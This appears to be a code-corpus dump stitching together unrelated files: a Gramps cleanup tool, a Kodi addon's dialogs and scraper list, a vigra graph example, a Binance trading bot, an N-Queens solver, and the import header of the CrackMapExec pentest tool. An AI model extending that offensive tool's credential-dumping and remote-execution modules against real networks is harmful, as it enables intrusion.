return Lines([line for line in lines if re.search(self.pattern, line)])
class grepv(object):
"similar to unix `grep -v` command (return lines that don't match."
def __init__(self, pattern):
self.pattern = pattern
def feed(self, lines):
"get input from pipe"
return Lines([line for line in lines
if not re.search(self.pattern, line)])
class fn(object):
"call function on each line."
def __init__(self, function):
self.defun = function
def feed(self, lines):
"get input from pipe"
return Lines([self.defun(line) for line in lines])
class PrintLines(object):
"Print lines."
def feed(self, lines): # pylint:disable=R0201
"Print lines."
for line in lines:
print line
return len(lines)
# aliases
cat = PrintLines()
printlines = PrintLines()
class Split(object):
"""Split input lines into columns, optionally specify token to split on.
Normally used through the `split' object.
"""
def __init__(self, token=None):
self.token = token
def feed(self, lines):
"get input from pipe"
return Lines([line.split(self.token) for line in lines])
split = Split()
class field(object):
"Extract column #n."
def __init__(self, n):
self.n = n
def feed(self, lines):
"get input from pipe"
return Lines([cols[self.n] for cols in _split(lines)])
class lineno(object):
"Extract line #n."
def __init__(self, n):
self.n = n
def feed(self, lines):
"get input from pipe"
return lines[self.n]
first = lineno(0)
second = lineno(1)
last = lineno(-1)
class head(object):
"Extract first n lines."
def __init__(self, n):
self.n = n
def feed(self, lines):
"get input from pipe"
return Lines(lines[:self.n])
| gpl-2.0 | 7,848,778,357,293,426,000 | 19.555 | 79 | 0.600097 | false |
Forage/Gramps | gramps/plugins/tool/removeunused.py | 1 | 18449 | #
# Gramps - a GTK+/GNOME based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2008 Brian G. Matherly
# Copyright (C) 2008 Stephane Charette
# Copyright (C) 2010 Jakim Friant
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# $Id$
"Find unused objects and remove with the user's permission."
#-------------------------------------------------------------------------
#
# python modules
#
#-------------------------------------------------------------------------
from __future__ import with_statement
from gramps.gen.const import GRAMPS_LOCALE as glocale
_ = glocale.get_translation().gettext
#------------------------------------------------------------------------
#
# Set up logging
#
#------------------------------------------------------------------------
import logging
log = logging.getLogger(".RemoveUnused")
#-------------------------------------------------------------------------
#
# gtk modules
#
#-------------------------------------------------------------------------
from gi.repository import Gdk
from gi.repository import Gtk
from gi.repository import GObject
#-------------------------------------------------------------------------
#
# GRAMPS modules
#
#-------------------------------------------------------------------------
from gramps.gen.db import DbTxn
from gramps.gen.errors import WindowActiveError
from gramps.gui.managedwindow import ManagedWindow
from gramps.gen.datehandler import displayer as _dd
from gramps.gen.updatecallback import UpdateCallback
from gramps.gui.plug import tool
from gramps.gui.glade import Glade
#-------------------------------------------------------------------------
#
# runTool
#
#-------------------------------------------------------------------------
class RemoveUnused(tool.Tool, ManagedWindow, UpdateCallback):
MARK_COL = 0
OBJ_ID_COL = 1
OBJ_NAME_COL = 2
OBJ_TYPE_COL = 3
OBJ_HANDLE_COL = 4
def __init__(self, dbstate, uistate, options_class, name, callback=None):
self.title = _('Unused Objects')
tool.Tool.__init__(self, dbstate, options_class, name)
if self.db.readonly:
return
ManagedWindow.__init__(self, uistate,[], self.__class__)
UpdateCallback.__init__(self, self.uistate.pulse_progressbar)
self.dbstate = dbstate
self.uistate = uistate
self.tables = {
'events' : {'get_func': self.db.get_event_from_handle,
'remove' : self.db.remove_event,
'get_text': self.get_event_text,
'editor' : 'EditEvent',
'stock' : 'gramps-event',
'name_ix' : 4},
'sources' : {'get_func': self.db.get_source_from_handle,
'remove' : self.db.remove_source,
'get_text': None,
'editor' : 'EditSource',
'stock' : 'gramps-source',
'name_ix' : 2},
'places' : {'get_func': self.db.get_place_from_handle,
'remove' : self.db.remove_place,
'get_text': None,
'editor' : 'EditPlace',
'stock' : 'gramps-place',
'name_ix' : 2},
'media' : {'get_func': self.db.get_object_from_handle,
'remove' : self.db.remove_object,
'get_text': None,
'editor' : 'EditMedia',
'stock' : 'gramps-media',
'name_ix' : 4},
'repos' : {'get_func': self.db.get_repository_from_handle,
'remove' : self.db.remove_repository,
'get_text': None,
'editor' : 'EditRepository',
'stock' : 'gramps-repository',
'name_ix' : 3},
'notes' : {'get_func': self.db.get_note_from_handle,
'remove' : self.db.remove_note,
'get_text': self.get_note_text,
'editor' : 'EditNote',
'stock' : 'gramps-notes',
'name_ix' : 2},
}
self.init_gui()
def init_gui(self):
self.top = Glade()
window = self.top.toplevel
self.set_window(window, self.top.get_object('title'), self.title)
self.events_box = self.top.get_object('events_box')
self.sources_box = self.top.get_object('sources_box')
self.places_box = self.top.get_object('places_box')
self.media_box = self.top.get_object('media_box')
self.repos_box = self.top.get_object('repos_box')
self.notes_box = self.top.get_object('notes_box')
self.find_button = self.top.get_object('find_button')
self.remove_button = self.top.get_object('remove_button')
self.events_box.set_active(self.options.handler.options_dict['events'])
self.sources_box.set_active(
self.options.handler.options_dict['sources'])
self.places_box.set_active(
self.options.handler.options_dict['places'])
self.media_box.set_active(self.options.handler.options_dict['media'])
self.repos_box.set_active(self.options.handler.options_dict['repos'])
self.notes_box.set_active(self.options.handler.options_dict['notes'])
self.warn_tree = self.top.get_object('warn_tree')
self.warn_tree.connect('button_press_event', self.double_click)
self.selection = self.warn_tree.get_selection()
self.mark_button = self.top.get_object('mark_button')
self.mark_button.connect('clicked', self.mark_clicked)
self.unmark_button = self.top.get_object('unmark_button')
self.unmark_button.connect('clicked', self.unmark_clicked)
self.invert_button = self.top.get_object('invert_button')
self.invert_button.connect('clicked', self.invert_clicked)
self.real_model = Gtk.ListStore(GObject.TYPE_BOOLEAN,
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_STRING,
GObject.TYPE_STRING)
self.sort_model = self.real_model.sort_new_with_model()
self.warn_tree.set_model(self.sort_model)
self.renderer = Gtk.CellRendererText()
self.img_renderer = Gtk.CellRendererPixbuf()
self.bool_renderer = Gtk.CellRendererToggle()
self.bool_renderer.connect('toggled', self.selection_toggled)
# Add mark column
mark_column = Gtk.TreeViewColumn(_('Mark'), self.bool_renderer,
active=RemoveUnused.MARK_COL)
mark_column.set_sort_column_id(RemoveUnused.MARK_COL)
self.warn_tree.append_column(mark_column)
# Add image column
img_column = Gtk.TreeViewColumn(None, self.img_renderer )
img_column.set_cell_data_func(self.img_renderer, self.get_image)
self.warn_tree.append_column(img_column)
# Add column with object gramps_id
id_column = Gtk.TreeViewColumn(_('ID'), self.renderer,
text=RemoveUnused.OBJ_ID_COL)
id_column.set_sort_column_id(RemoveUnused.OBJ_ID_COL)
self.warn_tree.append_column(id_column)
# Add column with object name
name_column = Gtk.TreeViewColumn(_('Name'), self.renderer,
text=RemoveUnused.OBJ_NAME_COL)
name_column.set_sort_column_id(RemoveUnused.OBJ_NAME_COL)
self.warn_tree.append_column(name_column)
self.top.connect_signals({
"destroy_passed_object" : self.close,
"on_remove_button_clicked": self.do_remove,
"on_find_button_clicked" : self.find,
"on_delete_event" : self.close,
})
self.dc_label = self.top.get_object('dc_label')
self.sensitive_list = [self.warn_tree, self.mark_button,
self.unmark_button, self.invert_button,
self.dc_label, self.remove_button]
for item in self.sensitive_list:
item.set_sensitive(False)
self.show()
def build_menu_names(self, obj):
return (self.title, None)
def find(self, obj):
self.options.handler.options_dict.update(
events = self.events_box.get_active(),
sources = self.sources_box.get_active(),
places = self.places_box.get_active(),
media = self.media_box.get_active(),
repos = self.repos_box.get_active(),
notes = self.notes_box.get_active(),
)
for item in self.sensitive_list:
item.set_sensitive(True)
self.uistate.set_busy_cursor(True)
self.uistate.progress.show()
self.window.get_window().set_cursor(Gdk.Cursor.new(Gdk.CursorType.WATCH))
self.real_model.clear()
self.collect_unused()
self.uistate.progress.hide()
self.uistate.set_busy_cursor(False)
self.window.get_window().set_cursor(None)
self.reset()
# Save options
self.options.handler.save_options()
def collect_unused(self):
# Run through all requested tables and check all objects
# for being referenced some place. If not, add_results on them.
db = self.db
tables = (
('events', db.get_event_cursor, db.get_number_of_events),
('sources', db.get_source_cursor, db.get_number_of_sources),
('places', db.get_place_cursor, db.get_number_of_places),
('media', db.get_media_cursor, db.get_number_of_media_objects),
('repos', db.get_repository_cursor, db.get_number_of_repositories),
('notes', db.get_note_cursor, db.get_number_of_notes),
)
for (the_type, cursor_func, total_func) in tables:
if not self.options.handler.options_dict[the_type]:
# This table was not requested. Skip it.
continue
with cursor_func() as cursor:
self.set_total(total_func())
fbh = db.find_backlink_handles
for handle, data in cursor:
if not any(h for h in fbh(handle)):
self.add_results((the_type, handle, data))
self.update()
self.reset()
def do_remove(self, obj):
with DbTxn(_("Remove unused objects"), self.db, batch=False) as trans:
self.db.disable_signals()
for row_num in range(len(self.real_model)-1, -1, -1):
path = (row_num,)
row = self.real_model[path]
if not row[RemoveUnused.MARK_COL]:
continue
the_type = row[RemoveUnused.OBJ_TYPE_COL]
handle = row[RemoveUnused.OBJ_HANDLE_COL]
remove_func = self.tables[the_type]['remove']
remove_func(handle, trans)
self.real_model.remove(row.iter)
self.db.enable_signals()
self.db.request_rebuild()
def selection_toggled(self, cell, path_string):
sort_path = tuple(map(int, path_string.split(':')))
real_path = self.sort_model.convert_path_to_child_path(Gtk.TreePath(sort_path))
row = self.real_model[real_path]
row[RemoveUnused.MARK_COL] = not row[RemoveUnused.MARK_COL]
self.real_model.row_changed(real_path, row.iter)
def mark_clicked(self, mark_button):
for row_num in range(len(self.real_model)):
path = (row_num,)
row = self.real_model[path]
row[RemoveUnused.MARK_COL] = True
def unmark_clicked(self, unmark_button):
for row_num in range(len(self.real_model)):
path = (row_num,)
row = self.real_model[path]
row[RemoveUnused.MARK_COL] = False
def invert_clicked(self, invert_button):
for row_num in range(len(self.real_model)):
path = (row_num,)
row = self.real_model[path]
row[RemoveUnused.MARK_COL] = not row[RemoveUnused.MARK_COL]
def double_click(self, obj, event):
if event.type == Gdk.EventType._2BUTTON_PRESS and event.button == 1:
(model, node) = self.selection.get_selected()
if not node:
return
sort_path = self.sort_model.get_path(node)
real_path = self.sort_model.convert_path_to_child_path(sort_path)
row = self.real_model[real_path]
the_type = row[RemoveUnused.OBJ_TYPE_COL]
handle = row[RemoveUnused.OBJ_HANDLE_COL]
self.call_editor(the_type, handle)
def call_editor(self, the_type, handle):
try:
obj = self.tables[the_type]['get_func'](handle)
editor_str = 'from gramps.gui.editors import %s as editor' % (
self.tables[the_type]['editor']
)
exec(editor_str)
editor(self.dbstate, self.uistate, [], obj)
except WindowActiveError:
pass
def get_image(self, column, cell, model, iter, user_data=None):
the_type = model.get_value(iter, RemoveUnused.OBJ_TYPE_COL)
the_stock = self.tables[the_type]['stock']
cell.set_property('stock-id', the_stock)
def add_results(self, results):
(the_type, handle, data) = results
gramps_id = data[1]
# if we have a function that will return to us some type
# of text summary, then we should use it; otherwise we'll
# use the generic field index provided in the tables above
if self.tables[the_type]['get_text']:
text = self.tables[the_type]['get_text'](the_type, handle, data)
else:
# grab the text field index we know about, and hope
# it represents something useful to the user
name_ix = self.tables[the_type]['name_ix']
text = data[name_ix]
# insert a new row into the table
self.real_model.append(row=[False, gramps_id, text, the_type, handle])
def get_event_text(self, the_type, handle, data):
"""
Come up with a short line of text that we can use as
a summary to represent this event.
"""
# get the event:
event = self.tables[the_type]['get_func'](handle)
# first check to see if the event has a descriptive name
text = event.get_description() # (this is rarely set for events)
# if we don't have a description...
if text == '':
# ... then we merge together several fields
# get the event type (marriage, birth, death, etc.)
text = str(event.get_type())
# see if there is a date
date = _dd.display(event.get_date_object())
if date != '':
text += '; %s' % date
# see if there is a place
place_handle = event.get_place_handle()
if place_handle:
place = self.db.get_place_from_handle(place_handle)
text += '; %s' % place.get_title()
return text
def get_note_text(self, the_type, handle, data):
"""
We need just the first few words of a note as a summary.
"""
# get the note object
note = self.tables[the_type]['get_func'](handle)
# get the note text; this ignores (discards) formatting
text = note.get()
# convert whitespace to a single space
text = " ".join(text.split())
# if the note is too long, truncate it
if len(text) > 80:
text = text[:80] + "..."
return text
#------------------------------------------------------------------------
#
#
#
#------------------------------------------------------------------------
class CheckOptions(tool.ToolOptions):
"""
Defines options and provides handling interface.
"""
def __init__(self, name, person_id=None):
tool.ToolOptions.__init__(self, name, person_id)
# Options specific for this report
self.options_dict = {
'events' : 1,
'sources' : 1,
'places' : 1,
'media' : 1,
'repos' : 1,
'notes' : 1,
}
self.options_help = {
'events' : ("=0/1","Whether to use check for unused events",
["Do not check events","Check events"],
True),
'sources' : ("=0/1","Whether to use check for unused sources",
["Do not check sources","Check sources"],
True),
'places' : ("=0/1","Whether to use check for unused places",
["Do not check places","Check places"],
True),
'media' : ("=0/1","Whether to use check for unused media",
["Do not check media","Check media"],
True),
'repos' : ("=0/1","Whether to use check for unused repositories",
["Do not check repositories","Check repositories"],
True),
'notes' : ("=0/1","Whether to use check for unused notes",
["Do not check notes","Check notes"],
True),
}
| gpl-2.0 | -5,002,553,252,887,925,000 | 38.505353 | 87 | 0.525286 | false |
azumimuo/family-xbmc-addon | plugin.video.salts/salts_lib/gui_utils.py | 1 | 13329 | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import xbmcgui
import time
import os
import kodi
import random
import json
from utils2 import reset_base_url, i18n
from trakt_api import Trakt_API
from salts_lib import log_utils
use_https = kodi.get_setting('use_https') == 'true'
trakt_timeout = int(kodi.get_setting('trakt_timeout'))
def get_pin():
AUTH_BUTTON = 200
LATER_BUTTON = 201
NEVER_BUTTON = 202
ACTION_PREVIOUS_MENU = 10
ACTION_BACK = 92
CENTER_Y = 6
CENTER_X = 2
class PinAuthDialog(xbmcgui.WindowXMLDialog):
auth = False
def onInit(self):
self.pin_edit_control = self.__add_editcontrol(30, 240, 40, 450)
self.setFocus(self.pin_edit_control)
auth = self.getControl(AUTH_BUTTON)
never = self.getControl(NEVER_BUTTON)
self.pin_edit_control.controlUp(never)
self.pin_edit_control.controlLeft(never)
self.pin_edit_control.controlDown(auth)
self.pin_edit_control.controlRight(auth)
auth.controlUp(self.pin_edit_control)
auth.controlLeft(self.pin_edit_control)
never.controlDown(self.pin_edit_control)
never.controlRight(self.pin_edit_control)
def onAction(self, action):
# print 'Action: %s' % (action.getId())
if action == ACTION_PREVIOUS_MENU or action == ACTION_BACK:
self.close()
def onControl(self, control):
# print 'onControl: %s' % (control)
pass
def onFocus(self, control):
# print 'onFocus: %s' % (control)
pass
def onClick(self, control):
# print 'onClick: %s' % (control)
if control == AUTH_BUTTON:
if not self.__get_token():
kodi.notify(msg=i18n('pin_auth_failed'), duration=5000)
return
self.auth = True
if control == LATER_BUTTON:
kodi.notify(msg=i18n('remind_in_24hrs'), duration=5000)
kodi.set_setting('last_reminder', str(int(time.time())))
if control == NEVER_BUTTON:
kodi.notify(msg=i18n('use_addon_settings'), duration=5000)
kodi.set_setting('last_reminder', '-1')
if control in [AUTH_BUTTON, LATER_BUTTON, NEVER_BUTTON]:
self.close()
def __get_token(self):
pin = self.pin_edit_control.getText().strip()
if pin:
try:
trakt_api = Trakt_API(use_https=use_https, timeout=trakt_timeout)
result = trakt_api.get_token(pin=pin)
kodi.set_setting('trakt_oauth_token', result['access_token'])
kodi.set_setting('trakt_refresh_token', result['refresh_token'])
profile = trakt_api.get_user_profile(cached=False)
kodi.set_setting('trakt_user', '%s (%s)' % (profile['username'], profile['name']))
return True
except Exception as e:
log_utils.log('Trakt Authorization Failed: %s' % (e), log_utils.LOGDEBUG)
return False
return False
# have to add edit controls programatically because getControl() (hard) crashes XBMC on them
def __add_editcontrol(self, x, y, height, width):
media_path = os.path.join(kodi.get_path(), 'resources', 'skins', 'Default', 'media')
temp = xbmcgui.ControlEdit(0, 0, 0, 0, '', font='font12', textColor='0xFFFFFFFF', focusTexture=os.path.join(media_path, 'button-focus2.png'),
noFocusTexture=os.path.join(media_path, 'button-nofocus.png'), _alignment=CENTER_Y | CENTER_X)
temp.setPosition(x, y)
temp.setHeight(height)
temp.setWidth(width)
self.addControl(temp)
return temp
dialog = PinAuthDialog('TraktPinAuthDialog.xml', kodi.get_path())
dialog.doModal()
if dialog.auth:
kodi.notify(msg=i18n('trakt_auth_complete'), duration=3000)
del dialog
class ProgressDialog(object):
def __init__(self, heading, line1='', line2='', line3='', active=True):
if active:
self.pd = xbmcgui.DialogProgress()
self.pd.create(heading, line1, line2, line3)
self.pd.update(0)
else:
self.pd = None
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
if self.pd is not None:
self.pd.close()
del self.pd
def is_canceled(self):
if self.pd is not None:
return self.pd.iscanceled()
else:
return False
def update(self, percent, line1='', line2='', line3=''):
if self.pd is not None:
self.pd.update(percent, line1, line2, line3)
def perform_auto_conf(responses):
length = len(responses)
TOTAL = 12
if length < TOTAL:
responses += [True] * (TOTAL - length)
if responses[0]: kodi.set_setting('trakt_timeout', '60')
if responses[1]: kodi.set_setting('calendar-day', '-1')
if responses[2]: kodi.set_setting('calendar_time', '2')
if responses[3]: kodi.set_setting('source_timeout', '20')
if responses[4]: kodi.set_setting('include_watchlist_next', 'true')
if responses[5]: kodi.set_setting('filter_direct', 'true')
if responses[6]: kodi.set_setting('filter_unusable', 'true')
if responses[7]: kodi.set_setting('show_debrid', 'true')
if responses[8]: kodi.set_setting('source_results', '0')
if responses[9]:
kodi.set_setting('enable_sort', 'true')
kodi.set_setting('sort1_field', '2')
kodi.set_setting('sort2_field', '5')
kodi.set_setting('sort3_field', '6')
kodi.set_setting('sort4_field', '1')
kodi.set_setting('sort5_field', '3')
kodi.set_setting('sort6_field', '4')
if responses[10]:
tiers = ['Local', 'Furk.net', 'Premiumize.me', 'EasyNews', 'DD.tv', 'NoobRoom',
['WatchHD', 'IFlix', 'MoviesPlanet', 'TVWTVS', '9Movies', '123Movies', 'niter.tv', 'HDMovie14', 'ororo.tv'],
['StreamLord', 'CyberReel', 'MWM', 'tunemovie', 'afdah.org', 'xmovies8', 'xmovies8.v2', 'MovieXK'],
['torba.se', 'Rainierland', 'FardaDownload', 'zumvo.com', 'PutMV', 'MiraDeTodo', 'beinmovie', 'FireMoviesHD'],
['IzlemeyeDeger', 'SezonLukDizi', 'Dizimag', 'Dizilab', 'Dizigold', 'Dizibox', 'Diziay', 'Dizipas', 'OneClickTVShows'],
['DayT.se', 'DDLValley', 'ReleaseBB', 'MyVideoLinks.eu', 'OCW', 'RLSSource.net', 'TVRelease.Net', 'alluc.com'],
['IceFilms', 'WatchEpisodes', 'PrimeWire', 'SantaSeries', 'Flixanity', 'wso.ch', 'WatchSeries', 'UFlix.org', 'Putlocker'],
['funtastic-vids', 'WatchFree.to', 'pftv', 'streamallthis.is', 'Movie4K', 'afdah', 'SolarMovie', 'yify-streaming'],
['MovieSub', 'MovieHut', 'CouchTunerV2', 'CouchTunerV1', 'Watch8Now', 'yshows', 'TwoMovies.us', 'iWatchOnline'],
['vidics.ch', 'pubfilm', 'OnlineMoviesIs', 'OnlineMoviesPro', 'ViewMovies', 'movie25', 'viooz.ac', 'view47', 'MoviesHD'],
['wmo.ch', 'ayyex', 'stream-tv.co', 'clickplay.to', 'MintMovies', 'MovieNight', 'cmz', 'ch131', 'filmikz.ch'],
['MovieTube', 'LosMovies', 'FilmStreaming.in', 'moviestorm.eu', 'MerDB']]
sso = []
random_sso = kodi.get_setting('random_sso') == 'true'
for tier in tiers:
if isinstance(tier, basestring):
sso.append(tier)
else:
if random_sso:
random.shuffle(tier)
sso += tier
kodi.set_setting('source_sort_order', '|'.join(sso))
if responses[11]: reset_base_url()
trigger = [False, True, False, True, False, True, True, False, True, False, False, False]
if all([t == r for t, r in zip(trigger, responses)]):
kodi.set_setting('scraper_download', 'true')
kodi.notify(msg=i18n('auto_conf_complete'))
def do_auto_config():
ACTION_PREVIOUS_MENU = 10
ACTION_BACK = 92
CONTINUE_BUTTON = 200
CANCEL_BUTTON = 201
starty = 60
posx = 30
gap = 35
RADIO_BUTTONS = [
i18n('set_trakt_timeout'),
i18n('set_cal_start'),
i18n('set_cal_airtime'),
i18n('set_scraper_timeout'),
i18n('set_wl_mne'),
i18n('set_test_direct'),
i18n('set_filter_unusable'),
i18n('set_show_debrid'),
i18n('set_no_limit'),
i18n('set_source_sort'),
i18n('set_sso'),
i18n('set_reset_url'),
i18n('select_all_none')]
class AutoConfDialog(xbmcgui.WindowXMLDialog):
def onInit(self):
log_utils.log('onInit:', log_utils.LOGDEBUG)
self.OK = False
self.radio_buttons = []
posy = starty
for label in RADIO_BUTTONS:
self.radio_buttons.append(self.__get_radio_button(posx, posy, label))
posy += gap
try: responses = json.loads(kodi.get_setting('prev_responses'))
except: responses = [True] * len(self.radio_buttons)
if len(responses) < len(self.radio_buttons):
responses += [True] * (len(self.radio_buttons) - len(responses))
self.addControls(self.radio_buttons)
last_button = None
for response, radio_button in zip(responses, self.radio_buttons):
radio_button.setSelected(response)
if last_button is not None:
radio_button.controlUp(last_button)
radio_button.controlLeft(last_button)
last_button.controlDown(radio_button)
last_button.controlRight(radio_button)
last_button = radio_button
continue_ctrl = self.getControl(CONTINUE_BUTTON)
cancel_ctrl = self.getControl(CANCEL_BUTTON)
self.radio_buttons[0].controlUp(cancel_ctrl)
self.radio_buttons[0].controlLeft(cancel_ctrl)
self.radio_buttons[-1].controlDown(continue_ctrl)
self.radio_buttons[-1].controlRight(continue_ctrl)
continue_ctrl.controlUp(self.radio_buttons[-1])
continue_ctrl.controlLeft(self.radio_buttons[-1])
cancel_ctrl.controlDown(self.radio_buttons[0])
cancel_ctrl.controlRight(self.radio_buttons[0])
def __get_radio_button(self, x, y, label):
kwargs = {'font': 'font12', 'focusTexture': 'button-focus2.png', 'noFocusTexture': 'button-nofocus.png', 'focusOnTexture': 'radiobutton-focus.png',
'noFocusOnTexture': 'radiobutton-focus.png', 'focusOffTexture': 'radiobutton-nofocus.png', 'noFocusOffTexture': 'radiobutton-nofocus.png'}
temp = xbmcgui.ControlRadioButton(x, y, 450, 30, label, **kwargs)
return temp
def onAction(self, action):
# log_utils.log('Action: %s' % (action.getId()), log_utils.LOGDEBUG)
if action == ACTION_PREVIOUS_MENU or action == ACTION_BACK:
self.close()
def onControl(self, control):
# log_utils.log('onControl: %s' % (control), log_utils.LOGDEBUG)
pass
def onFocus(self, control):
# log_utils.log('onFocus: %s' % (control), log_utils.LOGDEBUG)
pass
def onClick(self, control):
# log_utils.log('onClick: %s' % (control), log_utils.LOGDEBUG)
focus_button = self.getControl(control)
if focus_button == self.radio_buttons[-1]:
all_status = focus_button.isSelected()
for button in self.radio_buttons:
button.setSelected(all_status)
if control == CONTINUE_BUTTON:
self.OK = True
if control == CANCEL_BUTTON:
self.OK = False
if control == CONTINUE_BUTTON or control == CANCEL_BUTTON:
self.close()
def get_responses(self):
return [bool(button.isSelected()) for button in self.radio_buttons]
dialog = AutoConfDialog('AutoConfDialog.xml', kodi.get_path())
dialog.doModal()
if dialog.OK:
responses = dialog.get_responses()
kodi.set_setting('prev_responses', json.dumps(responses))
perform_auto_conf(responses)
del dialog
| gpl-2.0 | 7,353,126,879,999,772,000 | 41.858521 | 160 | 0.572736 | false |
kod3r/vigra | vigranumpy/examples/rag3d.py | 7 | 1827 | import vigra
from vigra import graphs
from vigra import numpy
from vigra import Timer
iEdgeMap = graphs.implicitMeanEdgeMap
numpy.random.seed(42)
# input
shape = [200, 100, 100]
data = numpy.random.rand(*shape).astype(numpy.float32)
data = vigra.taggedView(data,"xyz")
if False:
labels = numpy.random.randint(5, size=shape[0]*shape[1]*shape[2])
labels = labels.reshape(shape).astype(numpy.uint32)
labels = vigra.analysis.labelVolume(labels)
adjListGraph = graphs.listGraph()
gridGraph = graphs.gridGraph(shape)
rag = graphs.regionAdjacencyGraph(gridGraph, labels)
rag.writeHDF5("bla.h5", "dset")
else :
# load the region adjacency graph
rag = graphs.loadGridRagHDF5("bla.h5","dset")
print rag.labels.shape, rag.labels.dtype ,type(rag.labels)
print "accumulate edge and node features"
edgeCuesMean = rag.accumulateEdgeFeatures( iEdgeMap(rag.baseGraph, data) )
edgeCuesMean = numpy.array([edgeCuesMean, edgeCuesMean]).T
nodeCuesMean = rag.accumulateNodeFeatures(data)
nodeCuesMean = numpy.array([nodeCuesMean, nodeCuesMean]).T
mergeGraph = graphs.mergeGraph(rag)
featureManager = graphs.NeuroDynamicFeatures(rag, mergeGraph)
# assign features
print "edgeCuesShape", edgeCuesMean.shape
featureManager.assignEdgeCues(edgeCuesMean)
featureManager.assignNodeCues(nodeCuesMean)
featureManager.assignEdgeSizes(rag.edgeLengths())
featureManager.assignNodeSizes(rag.nodeSize())
# register the callback mechainsm
featureManager.registerCallbacks()
mgEdge = mergeGraph.edgeFromId(1)
print "edge features", featureManager.getFeatures( mergeGraph.edgeFromId(27885))
mergeGraph.contractEdge(mgEdge)
print "edge features", featureManager.getFeatures( mergeGraph.edgeFromId(27885))
#for edge in mergeGraph.edgeIter():
# print "edge features", featureManager.getFeatures(edge)
| mit | -5,023,103,974,042,999,000 | 24.732394 | 80 | 0.775041 | false |
terentjew-alexey/market-analysis-system | mas_cryptobot/bot-rl_v0.0.py | 1 | 1653 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from keras.optimizers import Adam
from rl.agents.dqn import DQNAgent
from rl.policy import BoltzmannQPolicy
from rl.memory import SequentialMemory
from mas_tools.envs import MarketEnv
from mas_tools.markets import AbstractMarket
from mas_tools.api import Binance
from mas_tools.models import simple_model
MY_API_KEY = '---'
MY_API_SECRET = '---'
ENV_NAME = 'Binance'
## Init exchange api
api = Binance(API_KEY=MY_API_KEY, API_SECRET=MY_API_SECRET)
## Init market environment
connector = AbstractMarket(api, symbols=['ETHUSDT'], periods='5m', balance=1000.0)
market = MarketEnv(connector)
print('connector shape', connector.shape)
## Environment parameters
observation_shape = market.observation_space.shape
nb_actions = market.action_space.n
print('state =', observation_shape, '| actions =', nb_actions)
## Init ML-model for agent
model = simple_model(observation_shape, nb_actions)
## Init RL-metod parameters
memory = SequentialMemory(limit=10000, window_length=1)
policy = BoltzmannQPolicy()
## Init RL agent
agent = DQNAgent(model=model, nb_actions=nb_actions,
memory=memory, nb_steps_warmup=1000,
target_model_update=1e-2, policy=policy,
# enable_dueling_network=True, dueling_type='avg'
)
agent.compile(Adam(lr=1e-3), metrics=['mae'])
## Train and evaluation
# agent.load_weights('dqn_{}_weights.h5f'.format(ENV_NAME))
agent.fit(market, nb_steps=100000, visualize=False, verbose=2)
agent.save_weights('dqn_{}_weights.h5f'.format(ENV_NAME), overwrite=True)
agent.test(market, nb_episodes=5, visualize=False)
| mit | -7,393,049,592,200,415,000 | 28.517857 | 82 | 0.715668 | false |
djsilenceboy/LearnTest | Python_Test/PyCodePractice/com/djs/learn/NQueues.py | 1 | 1882 | '''
@author: Du Jiang
https://leetcode.com/problems/n-queens/description/
'''
class Solution:
def innerSolveNQueens(self, n, positions, rowNum, validColumns):
if rowNum == n:
self.result.append(["." * positions[i] + "Q" + "." *
(n - 1 - positions[i]) for i in range(n)])
return
for column in range(n):
valid = True
if (column in validColumns) and ((rowNum == 0) or (column < positions[rowNum - 1] - 1) or (column > positions[rowNum - 1] + 1)):
if rowNum > 0:
for k in range(rowNum - 1):
if (rowNum - k) == abs(column - positions[k]):
valid = False
break
else:
valid = False
if valid:
positions[rowNum] = column
validColumns.remove(column)
self.innerSolveNQueens(
n, positions, rowNum + 1, validColumns)
validColumns.add(column)
def solveNQueens(self, n):
"""
:type n: int
:rtype: List[List[str]]
"""
self.result = []
validColumns = {i for i in range(n)}
positions = [-1 for i in range(n)]
self.innerSolveNQueens(n, positions, 0, validColumns)
return self.result
def test(n):
solution = Solution()
print("n =", n)
result = solution.solveNQueens(n)
# print("result =", result)
print("result size =", len(result))
print("-" * 80)
def main():
# 2
test(4)
# 10
test(5)
# 4
test(6)
# 40
test(7)
# 92
test(8)
# 352
test(9)
# 724
test(10)
# 2,680
test(11)
# 14,200
test(12)
# 73,712
test(13)
# 365,596
test(14)
if __name__ == '__main__':
main()
| apache-2.0 | -4,831,033,325,880,515,000 | 22.234568 | 140 | 0.469182 | false |
masbog/CrackMapExec | crackmapexec.py | 3 | 117724 | #!/usr/bin/env python2
#This must be one of the first imports or else we get threading error on completion
from gevent import monkey
monkey.patch_all()
from gevent import sleep
from gevent.pool import Pool
from gevent import joinall
from netaddr import IPNetwork, IPRange, IPAddress, AddrFormatError
from threading import Thread
from base64 import b64encode
from struct import unpack, pack
from collections import OrderedDict
from impacket import smbserver, ntlm, winregistry
from impacket.dcerpc.v5 import transport, scmr, samr, drsuapi, rrp, tsch, srvs, wkst, epm
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL, OWNER_SECURITY_INFORMATION
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_GSS_NEGOTIATE
from impacket.ese import ESENT_DB
from impacket.structure import Structure
from impacket.nt_errors import STATUS_MORE_ENTRIES
from impacket.nmb import NetBIOSError
from impacket.smbconnection import *
